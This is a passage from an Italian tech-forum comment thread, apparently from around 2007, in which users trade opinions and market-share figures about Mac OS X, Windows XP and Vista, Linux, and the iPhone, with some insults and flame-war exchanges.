        per uso professionale ci vorrà ancora un po.Evidentemente sei MOLTO distratto... quando Apple ha presentato l'iPhone, ha specificato chiaramente che è un prodotto CONSUMER, e non per uso professionale.In questo momento, l'unico cellulare che si possa definire adatto a uso professionale - essenzialmente perché ha un sistema di posta valido - e che funzioni direi a occhio che è il RIM (Blackberry)... e guarda caso è l'unico che vende più di iPhone. ps giusto perché non pensiate che io lavoro per RIM, sappiate che comunque considero l'attivazione e la configurazione iniziale di un Blackberry un vero incubo...Pel
        • Mythos scrive:
          Re: niente NSA? :)

          ah sì? Allora ti sarà probabilmente sfuggita la
          notizia che nei rilevamenti di accesso a
          Internet, gli iPhone hanno superato di già LA
          SOMMA COMPLESSIVA DI TUTTI GLI SMARTPHONE
          WINDOWS.Fonte?
          • MeX scrive:
            Re: niente NSA? :)
            tohhttp://blogs.computerworld.com/canalys_figures_in_iphone_clear_winner_in_north_america
      • pippo75 scrive:
        Re: niente NSA? :)
        - Scritto da: lellykelly
        per me le vendite dell'iphone ci sono solo sulla
        base che se non lo hai sei uno sfigato... come
        con gli ipod agli inizi.quindi visto che io sono il re degli sfigati non posso prenderlo :(
  • Gutsy Gibbon scrive:
    Ma conoscete qualcuno che usa MacOS ?
    Salve gente,Mac os se non erro ha il 6& dell'utenza mondiale di PC... ma io conosco solo utenti uindos o, pochissimi, linux. E' proprio così diffuso, almeno in italia, il gioiellino apple??
    • MeX scrive:
      Re: Ma conoscete qualcuno che usa MacOS ?
      sicuramente è meno diffuso di Windows... e forse anche di Linux... ma se guardi le vendite di portatili dell'ultimo anno il Mac ha avuto un incremento notevole... diciamo che secondo me adesso è più facile conoscere qualcuno che usa OSX invece che Vista :)
      • Stefano scrive:
        Re: Ma conoscete qualcuno che usa MacOS ?
        - Scritto da: MeX
        sicuramente è meno diffuso di Windows... e forse
        anche di Linux...Veramente Linux ha lo 0,7% del mercato... contro il 6,8% della Apple
        • MeX scrive:
          Re: Ma conoscete qualcuno che usa MacOS ?
          si ma qui in Italia penso sia più diffuso Ubuntu di Mac OS... più che altro per quelli disperati che hanno preso il portatile nuovo con Vista... e ho tornano a XP o passano a Linux ;)
          • daniele scrive:
            Re: Ma conoscete qualcuno che usa MacOS ?
            Sono in molti quelli che usano MacOS, soprattutto sono cresciuti nell'ultimo anno. Gran parte di questi sono universitari, tra i quali sta iniziando a dilagare una vera e propria moda Apple-based
          • pippo scrive:
            Re: Ma conoscete qualcuno che usa MacOS ?

            Gran parte di
            questi sono universitari, tra i quali sta
            iniziando a dilagare una vera e propria moda
            Apple-based"moda" la parola giusta (rotfl)(rotfl)(rotfl)
          • Stefano scrive:
            Re: Ma conoscete qualcuno che usa MacOS ?
            - Scritto da: pippo

            Gran parte di

            questi sono universitari, tra i quali sta

            iniziando a dilagare una vera e propria moda

            Apple-based
            "moda" la parola giusta (rotfl)(rotfl)(rotfl)Peccato che anche svariati professori lo abbiano (in particolare informatici ed elettronici)...e dubito siano quei tipi di persone che comprano un computer per "moda".
          • pippo scrive:
            Re: Ma conoscete qualcuno che usa MacOS ?


            "moda" la parola giusta (rotfl)(rotfl)(rotfl)

            Peccato che anche svariati professori lo abbiano
            (in particolare informatici ed
            elettronici)...
            e dubito siano quei tipi di persone che comprano
            un computer per
            "moda".E da quando i nostri "professori" sono esempi da seguire? :D
          • PLONK_THIS scrive:
            Re: Ma conoscete qualcuno che usa MacOS ?
            - Scritto da: pippo


            "moda" la parola giusta (rotfl)(rotfl)(rotfl)



            Peccato che anche svariati professori lo abbiano

            (in particolare informatici ed

            elettronici)...

            e dubito siano quei tipi di persone che comprano

            un computer per

            "moda".
            E da quando i nostri "professori" sono esempi da
            seguire?
            :Dottimo contro-argomento...
          • Io blocco il P2P scrive:
            Re: Ma conoscete qualcuno che usa MacOS ?
            - Scritto da: PLONK_THIS
            - Scritto da: pippo



            "moda" la parola giusta
            (rotfl)(rotfl)(rotfl)





            Peccato che anche svariati professori lo
            abbiano


            (in particolare informatici ed


            elettronici)...


            e dubito siano quei tipi di persone che
            comprano


            un computer per


            "moda".

            E da quando i nostri "professori" sono esempi da

            seguire?

            :D


            ottimo contro-argomento...Peccato sia vero.
          • PLONK_THIS scrive:
            Re: Ma conoscete qualcuno che usa MacOS ?
            e in base a quale fantomatica teoria?oppure hai delle statistiche da proporre? che so hai fatto il porta a porta per sincerarti di non avvallare razzate?
          • Athlon64 scrive:
            Re: Ma conoscete qualcuno che usa MacOS ?
            - Scritto da: PLONK_THIS
            e in base a quale fantomatica teoria?PLONK_THIS è un troll. Le prove? Andate a vedere le decine di post in cui ripete ossessivamente una cosa sola:"Ma in base a cosa lo dici? Porta le prove!""Ma in base a cosa lo dici? Porta le prove!""Ma in base a cosa lo dici? Porta le prove!""Ma in base a cosa lo dici? Porta le prove!""Ma in base a cosa lo dici? Porta le prove!"Un disco rotto trolleggiante, le controprove portale tu, macaco!
          • PLONK_THIS scrive:
            Re: Ma conoscete qualcuno che usa MacOS ?
            - Scritto da: Athlon64
            - Scritto da: PLONK_THIS

            e in base a quale fantomatica teoria?

            PLONK_THIS è un troll. Le prove? Andate a vedere
            le decine di post in cui ripete ossessivamente
            una cosa
            sola:
            "Ma in base a cosa lo dici? Porta le prove!"
            "Ma in base a cosa lo dici? Porta le prove!"
            "Ma in base a cosa lo dici? Porta le prove!"
            "Ma in base a cosa lo dici? Porta le prove!"
            "Ma in base a cosa lo dici? Porta le prove!"

            Un disco rotto trolleggiante, le controprove
            portale tu,
            macaco!di cosa? le affermazioni le hai fatte tu emerito be8ta!
          • Mythos scrive:
            Re: Ma conoscete qualcuno che usa MacOS ?
            Probabilmente è semplicemente andato a scuola.Basta osservare come la media delle persone che postano su unforum utilizza l'italiano per capire la qualità della nostra scuola.. e di conseguenza dei professori.
          • Stefano scrive:
            Re: Ma conoscete qualcuno che usa MacOS ?
            - Scritto da: Mythos
            Probabilmente è semplicemente andato a scuola.
            Basta osservare come la media delle persone che
            postano su unforum utilizza l'italiano per capire
            la qualità della nostra scuola.. e di conseguenza
            dei
            professori.Io però mi riferivo a docenti universitari che di solito fanno il lavoro del professore come "secondo lavoro".
          • PLONK_THIS scrive:
            Re: Ma conoscete qualcuno che usa MacOS ?
            - Scritto da: Mythos
            Probabilmente è semplicemente andato a scuola.
            Basta osservare come la media delle persone che
            postano su unforum utilizza l'italiano per capire
            la qualità della nostra scuola.. e di conseguenza
            dei
            professori.e leggendoti non posso che darti ragione.
          • daniele scrive:
            Re: Ma conoscete qualcuno che usa MacOS ?
            Non capisco perché dici "peccato".Cos'ha di male Mac OS X?Se chi inizia ad usarlo non torna più indietro (come me, ad esempio) un motivo ci sarà, no?Fosse solo uno ...
          • Stefano scrive:
            Re: Ma conoscete qualcuno che usa MacOS ?
            - Scritto da: daniele
            Non capisco perché dici "peccato".
            Cos'ha di male Mac OS X?

            Se chi inizia ad usarlo non torna più indietro
            (come me, ad esempio) un motivo ci sarà,
            no?
            Fosse solo uno ...Credo che tu abbia frainteso il senso delle mie parole...io sono felice possessore di un iMac e di un MacBook...il mio peccato era in risposta al commento di pippo che recitava:"moda" la parola giusta:)Quindi il mio peccato serviva a sottolineare che il fatto che lui sostenesse che si trattava di moda fosse sbagliato!
          • anonimo01 scrive:
            Re: Ma conoscete qualcuno che usa MacOS ?

            "moda" la parola giusta (rotfl)(rotfl)(rotfl)ridi ridi che mamma ha fatto li gnocchi!non pensavo che un termine statistico potesse scatenare l'ilarità in una persona...immagino che questa:[img]http://upload.wikimedia.org/wikipedia/it/f/f2/Moda2.GIF[/img]ti faccia scompisciare...bah : strana gente...
          • Paco scrive:
            Re: Ma conoscete qualcuno che usa MacOS ?
            - Scritto da: pippo

            Gran parte di

            questi sono universitari, tra i quali sta

            iniziando a dilagare una vera e propria moda

            Apple-based
            "moda" la parola giusta (rotfl)(rotfl)(rotfl)Se per Apple la parola giusta è moda, qual è per Win o per Linux???
          • pippo scrive:
            Re: Ma conoscete qualcuno che usa MacOS ?



            Gran parte di


            questi sono universitari, tra i quali sta


            iniziando a dilagare una vera e propria moda


            Apple-based

            "moda" la parola giusta (rotfl)(rotfl)(rotfl)
            Se per Apple la parola giusta è moda, qual è per
            Win o per
            Linux???... lavoro? :D
          • Pel scrive:
            Re: Ma conoscete qualcuno che usa MacOS ?



            "moda" la parola giusta (rotfl)(rotfl)(rotfl)

            Se per Apple la parola giusta è moda, qual è per

            Win o per

            Linux???
            ... lavoro? :Ddirei più "sottomissione e rassegnazione"
          • PLONK_THIS scrive:
            Re: Ma conoscete qualcuno che usa MacOS ?
            - Scritto da: pippo



            Gran parte di



            questi sono universitari, tra i quali sta



            iniziando a dilagare una vera e propria moda



            Apple-based


            "moda" la parola giusta (rotfl)(rotfl)(rotfl)

            Se per Apple la parola giusta è moda, qual è per

            Win o per

            Linux???
            ... lavoro? :Dma LOL....per i tecnici Win = soldoni, per gli utenti = frustrazione nel non poter capire come mai quello che funzionava 5min fa ora smette di funzionare, per non poter capire come mai dopo 5giorni di uptime windows soffre di rallentamenti
          • daniele scrive:
            Re: Ma conoscete qualcuno che usa MacOS ?
            Concordo! Io con Mac OS ci lavoro (per me non è una "moda"), e rido dei miei colleghi che ogni 5 minuti imprecano e mandano macumbe a Bill e ai seguaci di Stalman
          • Stefano scrive:
            Re: Ma conoscete qualcuno che usa MacOS ?
            - Scritto da: daniele
            Concordo! Io con Mac OS ci lavoro (per me non è
            una "moda"), e rido dei miei colleghi che ogni 5
            minuti imprecano e mandano macumbe a Bill e ai
            seguaci di
            StalmanCredo che tu abbia frainteso il senso delle mie parole...io sono felice possessore di un iMac e di un MacBook...il mio peccato era in risposta al commento di pippo che recitava:"moda" la parola giusta :):)Quindi il mio peccato serviva a sottolineare che il fatto che lui sostenesse che si trattava di moda fosse sbagliato!
          • Stefano scrive:
            Re: Ma conoscete qualcuno che usa MacOS ?
            ops... sbagliato a rispondere... thred errato
          • anonimo01 scrive:
            Re: Ma conoscete qualcuno che usa MacOS ?

            Se per Apple la parola giusta è moda, qual è per
            Win o per
            Linux???per win abbiamo l'ottima "teoria delle mosche" che spiega molto bene il fenomeno... 8)per linux invece c'è "efficienza".
          • MeX scrive:
            Re: Ma conoscete qualcuno che usa MacOS ?
            già il Mac è di "moda" la gente lo sceglie perchè è bello, cool, divertente comodo produttivo sicuro...Vista è "imposto" la gente lo usa perchè sul portatile c'era quello... però è brutto, noioso, lento un-cool da sfigato e tutti fanno il downgrade...hai ragione... moda è proprio la parola giusta!
          • MeX scrive:
            Re: Ma conoscete qualcuno che usa MacOS ?
            si si... infatti ho anche parlato dello "sprint di vendita"... però se sei "fuori" dal mondo universitario non è ancora (purtroppo) così facile trovare chi usa Mac OSSicuramente il tasso di crescita di questo ultimo anno è impressionante!
          • Stefano scrive:
            Re: Ma conoscete qualcuno che usa MacOS ?
            - Scritto da: MeX
            si si... infatti ho anche parlato dello "sprint
            di vendita"... però se sei "fuori" dal mondo
            universitario non è ancora (purtroppo) così
            facile trovare chi usa Mac
            OSCredo che a parte i 15enni... sia anche difficile trovare linux user fuori dalle università!
          • MeX scrive:
            Re: Ma conoscete qualcuno che usa MacOS ?
            boh sarà che lavorando in ambito informatico sono io ad avere una percezione distorta... così come chi va all'uni... può essere :D
          • MeX scrive:
            Re: Ma conoscete qualcuno che usa MacOS ?
            penso sia dovuto all'immediatezza dell'interfaccia... anche io apprezzo la filosofia Linux ma non è immediata con Mac OS... che se pari il terminale hai la stessa cosa di una shell linux ;)
          • bbbbb scrive:
            Re: Ma conoscete qualcuno che usa MacOS ?
            Gia', il problema e' che come giustamente hai detto e' una moda e le mode si sa' . . . .
          • PLONK_THIS scrive:
            Re: Ma conoscete qualcuno che usa MacOS ?
            - Scritto da: bbbbb
            Gia', il problema e' che come giustamente hai
            detto e' una moda e le mode si sa' . . .
            .durano poco, nella fattispecie qualcosa tipo 20anni e oltre?;-)
          • Mythos scrive:
            Re: Ma conoscete qualcuno che usa MacOS ?

            e ho tornano a XP o passano a Linux...
    • Stefano scrive:
      Re: Ma conoscete qualcuno che usa MacOS ?
      al politecnico di Milano (ingegneria... non architettura) se si entra in una qualsiasi aula studio se ci sono una 20ina di persona almeno 4 o 5 sono Mac!
    • Zarbon scrive:
      Re: Ma conoscete qualcuno che usa MacOS ?
      - Scritto da: Gutsy Gibbon
      Salve gente,
      Mac os se non erro ha il 6& dell'utenza mondiale
      di PC... ma io conosco solo utenti uindos o,
      pochissimi, linux. E' proprio così diffuso,
      almeno in italia, il gioiellino
      apple??Qualsiasi buon musicista e buon grafico possiede un mac... usare pro tools con il mac è un'esperienza fantastica! Non c'è paragone
      • Mark scrive:
        Re: Ma conoscete qualcuno che usa MacOS ?

        usare pro tools con il mac è
        un'esperienza fantastica! Non c'è
        paragoneIo l'ho provato, ma mi trovo MOLTO meglio con FLStudio (www.flstudio.com). Sicuramente più elastico in fatto di sequencing e automation.
        • Hovercraft scrive:
          Re: Ma conoscete qualcuno che usa MacOS ?
          - Scritto da: Mark

          usare pro tools con il mac è

          un'esperienza fantastica! Non c'è

          paragone

          Io l'ho provato, ma mi trovo MOLTO meglio con
          FLStudio (www.flstudio.com). Sicuramente più
          elastico in fatto di sequencing e
          automation.Ci sono innumerevoli software meglio della parte sequencer di pro-tools, solo che il pro-tools include l'hardware ed e' quello che fa la differenza. Parlo di qualche annetto fa, magari adesso ci sono concorrenti di qualità: ma si parla di studio di registrazione, non di schede audio da 200 euro.
    • saxpax scrive:
      Re: Ma conoscete qualcuno che usa MacOS ?
      ma si qualche povero sfigato, che vuole butttare soldi, per un S.O cosi vulnerabile, sopratutto, per il nuovo Leopard, che ha fatto il suo eseordio con le schermate blu, in stile Windows 95, e si son dimenticati patchare le falle scoperte su Tiger, le hann portat su Leopard, per non parlare, del Firewall che prima non funzionava, adesso funziona ma è come se non ci fosse loro dicono colpa delle imcompatibilità, mah.....mi sa che Apple penso troppo all' estetica più che alla sicurezza.......
      • MeX scrive:
        Re: Ma conoscete qualcuno che usa MacOS ?
        già chissà perchè perrò tutti fanno il downgrade da Vista a XP mentre tutti comprano a comprare Leopard...
        • saxpax scrive:
          Re: Ma conoscete qualcuno che usa MacOS ?
          ma che strano molti utenti Mac fanno il downgrade da Leopard a Tiger, almeno il firewall su Tiger funziona. Vista dopo un giorno che era uscito, aveva il doppio delle vendite di Tiger e Leoprd messi insieme....
          • MeX scrive:
            Re: Ma conoscete qualcuno che usa MacOS ?
            già chissà perchè allora la parola più associata a Vista sia Flop :)
          • saxpax scrive:
            Re: Ma conoscete qualcuno che usa MacOS ?
            allora Leopard= vulnerabilitàma smettila di dare risposte da bambino, lo devi accetare, Mac OS X è più vulnerabile di Windows.
          • MeX scrive:
            Re: Ma conoscete qualcuno che usa MacOS ?
            e tu accetta che ad oggi non esistono virus per mac "get the facts" :D
          • PLONK_THIS scrive:
            Re: Ma conoscete qualcuno che usa MacOS ?
            - Scritto da: saxpax
            ma che strano molti utenti Mac fanno il downgradeci porti dei certi e non dei vagheggiamenti tuoi?
            da Leopard a Tiger, almeno il firewall su Tiger
            funziona.se sei dietro ad un router con fw integrato il fw del client non è indispensabile. Vista dopo un giorno che era uscito,
            aveva il doppio delle vendite di Tiger e Leoprd
            messi
            insieme....ma LOL, immagino tu possa postarci dei dati in merito, no?
          • Aiòò scrive:
            Re: Ma conoscete qualcuno che usa MacOS ?
            Il firewall lato client E' indispensabile perchè con quello puoi dare il consenso alle applicazioni di uscire sulla rete. Senza firewall lato client le applicazioni possono colloquiare a tua insaputa con chiunque le abbia predisposte in tal guisa, che tu lo voglia o no, firewall hardware o no.
          • logicaMente scrive:
            Re: Ma conoscete qualcuno che usa MacOS ?
            - Scritto da: saxpax
            ma che strano molti utenti Mac fanno il downgrade
            da Leopard a Tiger, ???
            almeno il firewall su Tiger
            funziona. Perchè invece su Leopard no? Forse ti riferisci al fatto che era disattivato di default (comunque con le porte chiuse - come su tutti gli unix/linux), ma se si parla di configurazioni di default è meglio evitare: i prodotti di Zio Bill hanno impostazioni di serie da paura :|
            Vista dopo un giorno che era uscito,
            aveva il doppio delle vendite di Tiger e Leoprd
            messi
            insieme....Secondo Punto Informatico no, ma magari tu hai dati più precisi ;) http://punto-informatico.it/p.aspx?i=2113100comunque [fase scazzo on] la Ford (marca a caso) ha oltre il doppio delle vendite di Ferrari e Lamborghini messi insieme... c'entra qualcosa con la qualità dei prodotti???
      • PLONK_THIS scrive:
        Re: Ma conoscete qualcuno che usa MacOS ?
        invece di lanciarti ogni volta in elucubrazioni, ci rispondi senza svicolare a questo?http://secunia.com/graph/?type=adv&period=all&prod...http://secunia.com/graph/?type=adv&period=all&prod...http://secunia.com/graph/?type=adv&period=2007&pro...forza non glissare anche stavolta
    • nome e guardone scrive:
      Re: Ma conoscete qualcuno che usa MacOS ?
      - Scritto da: Gutsy Gibbon
      Salve gente,
      Mac os se non erro ha il 6& dell'utenza mondiale
      di PC... ma io conosco solo utenti uindos o,
      pochissimi, linux. E' proprio così diffuso,
      almeno in italia, il gioiellino
      apple??E' meno del 5% e fondamentalemente stanno tutti negli USA dove ueppolz regala PC alle scuole.
      • Stefano scrive:
        Re: Ma conoscete qualcuno che usa MacOS ?
        - Scritto da: nome e guardone
        E' meno del 5% e fondamentalemente stanno tutti
        negli USA dove ueppolz regala PC alle
        scuole.Veramente è il 6,8%...
        • nome e guardone scrive:
          Re: Ma conoscete qualcuno che usa MacOS ?
          - Scritto da: Stefano
          - Scritto da: nome e guardone

          E' meno del 5% e fondamentalemente stanno tutti

          negli USA dove ueppolz regala PC alle

          scuole.

          Veramente è il 6,8%...Questo chi lo dice?
          • Stefano scrive:
            Re: Ma conoscete qualcuno che usa MacOS ?
            - Scritto da: nome e guardone
            - Scritto da: Stefano

            - Scritto da: nome e guardone


            E' meno del 5% e fondamentalemente stanno
            tutti


            negli USA dove ueppolz regala PC alle


            scuole.



            Veramente è il 6,8%...

            Questo chi lo dice?Leggi pure:http://marketshare.hitslink.com/report.aspx?qprid=8Io mi documento... non sparo cifre a caso!
    • lellykelly scrive:
      Re: Ma conoscete qualcuno che usa MacOS ?
      in ambito professionale è diffuso: tipografie, studi grafici, studi di registrazione, studi di montaggio video.io ho a che fare con le prime due tipologie di lavoro che ho scritto, e li di pc ce ne sono pochissimi. personalmente usando mac e pc per lavoro dico sempre che alla fine il risultato è lo stesso, ma mi continuano a rispondere che su mac si lavora meglio. ho tradotto questa frase con "si lavora con meno stress"nella mia esperienza lavorativa come tecnico, dal 2001, non ho mai riscontrato un problema grave su mac, tranne ovviamente quelli hardware. c'erano i virus su os 9 che si diffondevano con i programmi copiati, ma col osx nulla più, mai mac zombie, mai qualcuno entrato, nulla di nulla. e neppure su win, a parte i virus...chi dice di avere problemi, secondo me, se li va a cercare...
      • MeX scrive:
        Re: Ma conoscete qualcuno che usa MacOS ?
        "chi dice di avere problemi, secondo me, se li va a cercare..."il mio XP sul portatile originale OEM con firewall attivato e antivirus aggiornato mi spieghi perchè ci mette 30 minuti a SPEGNERSI?E perhcè quando si avvia e parte la musica è inutilizzabile per i primi 3 minuti in cui grattugia l'HD?Grazie!
        • lellykelly scrive:
          Re: Ma conoscete qualcuno che usa MacOS ?
          purtroppo ci devi lavorare sopra, togliere le cose inutili e le mille cose che partono all'avvio... prova easycleaner
          • MeX scrive:
            Re: Ma conoscete qualcuno che usa MacOS ?
            quindi se io installo dei programmi che da soli si mettono in avvio automatico e windows va in panico sono IO che mi SONO CERCATO I PROBLEMI? ah beh...
          • lellykelly scrive:
            Re: Ma conoscete qualcuno che usa MacOS ?
            oh, non ho fatto io windows...è così.se lo devi usare per forza ti adatti e lo rendi più usabile possibile.altrimenti ci sono le alternative...all'inizio ci perdi un po di tempo, ma poi diventa normale stargli dietro.anche su mac c'è la possibilità di toglere effetti e impostazioni che rallentano il computer, per non parlare dei programmi che mandano i tuoi dati alle case madri e che devi bloccare tramite appositi programmini...nulla è perfetto e ci saranno sempre cose che non andranno bene.altrimenti ti prendi un po' di tempo e ti fai il tuo bel os ilpiùbellomiglioreditutti
          • MeX scrive:
            Re: Ma conoscete qualcuno che usa MacOS ?
            ma scusa la tua reazione mi sempra diversa da quella in cui sostenevi che "i problemi te li devi cercare"... :)
          • lellykelly scrive:
            Re: Ma conoscete qualcuno che usa MacOS ?
            ho scritto che se uno si lamenta à perchè si va a cercare i problemi.nel senso che se sai che ci sono dei difetti in windows, e ci sono delle soluzioni per ridurli, è meglio usarle.ci sono quelli che comprano il pc, e come attaccano internett ci mettono 20 programmi di p2p prima ancora dell'antivirus... e poi si lamentano dicendo che win fa schifo.se uno si organizza prima, andrà quasi sempre tutto bene
          • MeX scrive:
            Re: Ma conoscete qualcuno che usa MacOS ?
            e perchè con il mac posso fare tutto questo senza avere problemi?
          • lellykelly scrive:
            Re: Ma conoscete qualcuno che usa MacOS ?
            perchè non è windows
          • MeX scrive:
            Re: Ma conoscete qualcuno che usa MacOS ?
            ah ok allora non è colpa mia ma del sistema operativo :)
          • nome e guardone scrive:
            Re: Ma conoscete qualcuno che usa MacOS ?
            - Scritto da: MeX
            e perchè con il mac posso fare tutto questo senza
            avere
            problemi?Perchè nemmeno li hai 20 programmi di p2p da installare.
          • MeX scrive:
            Re: Ma conoscete qualcuno che usa MacOS ?
            ma taci! :Dhttp://www.tuttologia.com/guida-p2p.html
        • XeM scrive:
          Re: Ma conoscete qualcuno che usa MacOS ?

          il mio XP sul portatile originale OEM con
          firewall attivato e antivirus aggiornato mi
          spieghi perchè ci mette 30 minuti a
          SPEGNERSI?

          E perhcè quando si avvia e parte la musica è
          inutilizzabile per i primi 3 minuti in cui
          grattugia
          l'HD?

          Grazie!perchè non sai un tubo di xp e non lo sai mantenere al top delle sue prestazioni...xp ha bisogno di manutenzione, e questa comunque non ti porta via più di 10-15 min al mese.io ho un P4 3ghz di quasi 4 anni, e mai dico mai ci ho reinstallato xp, ci ho messo dentro di tutto e fatto di tutto e ancora oggi non mi da problemi rilevanti. Ovvio tra aggiornamenti e SPack qualcosa si è rallentato. Ma non aspetto 3 minuti dopo il login.E ora ho appena comprato un notebook HP 8510w (onore e gloria alle schede nVidia QUADRO) con licenza XP...subito ho pensato che anche qui xp sarebbe stato rallentato dal fatto che cmqe resta un OS che va per i 7 anni di vita, invece ho dovuto ricredermi... una scheggia!Non so se sia per il portatile o per cosa, ma non ho mai lavorato su un xp così veloce e flessibile.SalutiXeM
          • MeX scrive:
            Re: Ma conoscete qualcuno che usa MacOS ?
            e perchè invece con macosx non c'è bisogno di fare tutto questo?
          • PLONK_THIS scrive:
            Re: Ma conoscete qualcuno che usa MacOS ?
            - Scritto da: XeM

            il mio XP sul portatile originale OEM con

            firewall attivato e antivirus aggiornato mi

            spieghi perchè ci mette 30 minuti a

            SPEGNERSI?



            E perhcè quando si avvia e parte la musica è

            inutilizzabile per i primi 3 minuti in cui

            grattugia

            l'HD?



            Grazie!

            perchè non sai un tubo di xp e non lo sai
            mantenere al top delle sue
            prestazioni...e secondo te devo sbattermi per mantenere un OS che dovrebbe essere in grado di non degradarsi da solo solamente perché lo uso e ci installo il sw che mi serve?suvvia basta razzate
            xp ha bisogno di manutenzione, e questa comunque
            non ti porta via più di 10-15 min al
            mese.che sono già troppi...
            io ho un P4 3ghz di quasi 4 anni, e mai dico mai
            ci ho reinstallato xp, ci ho messo dentro di
            tutto e fatto di tutto e ancora oggi non mi da
            problemi rilevanti. Ovvio tra aggiornamenti e
            SPack qualcosa si è rallentato. Ma non aspetto 3
            minuti dopo il
            login.
            non capita a me, ergo il problema non esiste...ottimo ragionamento da struzzo
            E ora ho appena comprato un notebook HP 8510w
            (onore e gloria alle schede nVidia QUADRO) con
            licenza
            XP...echissenefrega no?
            subito ho pensato che anche qui xp sarebbe stato
            rallentato dal fatto che cmqe resta un OS che va
            per i 7 anni di vita, invece ho dovuto
            ricredermi... una
            scheggia!certo..e dove è scappato, alle seychelles?anche il mio HP era una scheggia appena comprato, dopo 2 anni la scheggia s'è scheggiata ma LOL
            Non so se sia per il portatile o per cosa, ma non
            ho mai lavorato su un xp così veloce e
            flessibile.
            certo...accendilo e installaci dei sw, non limitarti a guardarlo e basta.se poi vuoi un XP che è leggero e molto + reattivo metti la versione FLP
            Saluti

            XeM
          • rotto n scrive:
            Re: Ma conoscete qualcuno che usa MacOS ?
            - Scritto da: PLONK_THIS
            - Scritto da: XeM


            il mio XP sul portatile originale OEM con


            firewall attivato e antivirus aggiornato mi


            spieghi perchè ci mette 30 minuti a


            SPEGNERSI?





            E perhcè quando si avvia e parte la musica è


            inutilizzabile per i primi 3 minuti in cui


            grattugia


            l'HD?





            Grazie!



            perchè non sai un tubo di xp e non lo sai

            mantenere al top delle sue

            prestazioni...

            e secondo te devo sbattermi per mantenere un OS
            che dovrebbe essere in grado di non degradarsi da
            solo solamente perché lo uso e ci installo il sw
            che mi
            serve?

            suvvia basta razzate



            xp ha bisogno di manutenzione, e questa comunque

            non ti porta via più di 10-15 min al

            mese.

            che sono già troppi...



            io ho un P4 3ghz di quasi 4 anni, e mai dico mai

            ci ho reinstallato xp, ci ho messo dentro di

            tutto e fatto di tutto e ancora oggi non mi da

            problemi rilevanti. Ovvio tra aggiornamenti e

            SPack qualcosa si è rallentato. Ma non aspetto 3

            minuti dopo il

            login.



            non capita a me, ergo il problema non
            esiste...ottimo ragionamento da struzzo




            E ora ho appena comprato un notebook HP 8510w

            (onore e gloria alle schede nVidia QUADRO) con

            licenza

            XP...

            echissenefrega no?


            subito ho pensato che anche qui xp sarebbe stato

            rallentato dal fatto che cmqe resta un OS che va

            per i 7 anni di vita, invece ho dovuto

            ricredermi... una

            scheggia!

            certo..e dove è scappato, alle seychelles?

            anche il mio HP era una scheggia appena comprato,
            dopo 2 anni la scheggia s'è scheggiata

            ma LOL



            Non so se sia per il portatile o per cosa, ma
            non

            ho mai lavorato su un xp così veloce e

            flessibile.



            certo...accendilo e installaci dei sw, non
            limitarti a guardarlo e
            basta.

            se poi vuoi un XP che è leggero e molto +
            reattivo metti la versione
            FLP



            Saluti



            XeM
        • AMEN scrive:
          Re: Ma conoscete qualcuno che usa MacOS ?
          - Scritto da: MeX

          il mio XP sul portatile originale OEM con
          firewall attivato e antivirus aggiornato mi
          spieghi perchè ci mette 30 minuti a
          SPEGNERSI?Se fosse linux, qualcuno ti direbbe che non sai configurarlo.....
    • pippuzzo scrive:
      Re: Ma conoscete qualcuno che usa MacOS ?
      - Scritto da: Gutsy Gibbon
      Salve gente,
      Mac os se non erro ha il 6& dell'utenza mondiale
      di PC... ma io conosco solo utenti uindos o,
      pochissimi, linux. E' proprio così diffuso,
      almeno in italia, il gioiellino
      apple??Conosco 6 persone (contando solo quelli che frequento abbastanza abitualmente), di cui 4 sono utenti windows che hanno acquistato un powerbook o imac di recente per uso personale.
      • pippuzzo scrive:
        Re: Ma conoscete qualcuno che usa MacOS ?
        - Scritto da: pippuzzo
        Conosco 6 persone (contando solo quelli che
        frequento abbastanza abitualmente), di cui 4 sono
        utenti windows che hanno acquistato un powerbook
        o imac di recente per uso
        personale.Volevo dire otto, ne avevo dimenticati due! :)
    • Paco scrive:
      Re: Ma conoscete qualcuno che usa MacOS ?
      - Scritto da: Gutsy Gibbon
      Salve gente,
      Mac os se non erro ha il 6& dell'utenza mondiale
      di PC... ma io conosco solo utenti uindos o,
      pochissimi, linux. E' proprio così diffuso,
      almeno in italia, il gioiellino
      apple??Pochi in Italia. La Apple è molto più diffusa all'estero, soprattutto negli Usa e in particolare nelle Università.Ma anche qui in Italia si comincia a diffondere fra gli studenti. Non è raro entrare in un'aula studio trovare 1 o 2 mac. Può sembrare poco, è molto meno di windows (mai visto uno con linux, ubuntu o altro), ma rispetto agli anni passati è un bel passo avanti.
    • facuz scrive:
      Re: Ma conoscete qualcuno che usa MacOS ?
      allora, facciamo il conto:io,Teo, Gianky, Michela, Marco, Paolo, ....solo contando gli amici siamo una decina.Vuoi che conto anche i conoscenti o ti basta per rovinare la tua personale statistica?Di questi alcuni ci lavorano in campo grafico, altri per fare musica, altri ancora lo usano per studio e altri semplicemente per uso "domestico".Invece mi sapresti dire se conosci qualcuno che aveva un Mac ma è tornato a Win perchè insoddisfatto?...
    • Fede scrive:
      Re: Ma conoscete qualcuno che usa MacOS ?
      Be io ho il mac :).. E da quando lo preso 5 miei amici se lo sono subito preso :).. Io vedo che si sta diffondendo alla grande ;)
    • HeroProtagonist scrive:
      Re: Ma conoscete qualcuno che usa MacOS ?
      Sono un architetto software in ambito enterprise. A partire dal 2002 ho cominciato a vedere una crescita impressionante degli sviluppatori che usano Mac. Alla Java conference di quest'anno 3-4 su 10. Io ho fatto lo switch da Linux 3 anni fa e da allora non mi sono pentito un solo momento. unica pecca ad oggi (ma candidate release giá pronta per gennaio) la mancanza della JVM per Java6.Mediamente ho un uptime di 5 giorni... al sesto lo riavvio perché esaurisco la batteroa ed ho intenzionalmente disabilitato il safe sleep.Oltre ad essere stabile, robusto, inaffondabile e sicuro (i problemi del firewall sono stati esagerati da certa stampa di parte), mi permette di fare tutto quello che mi pare come mi pare quand mi pare. Ho migrato su Leopard senza nemmeno fare il back-up. in meno di un'ora avevo il sistema perfettamente funzionante.Non vedo l'ora del prossimo upgrade della linea MacBook Pro per cambiare... se qualcuno vuole minimizzare il rischio e prendersi il mio MBP usato si metta pure in contatto ;)
    • XeM scrive:
      Re: Ma conoscete qualcuno che usa MacOS ?
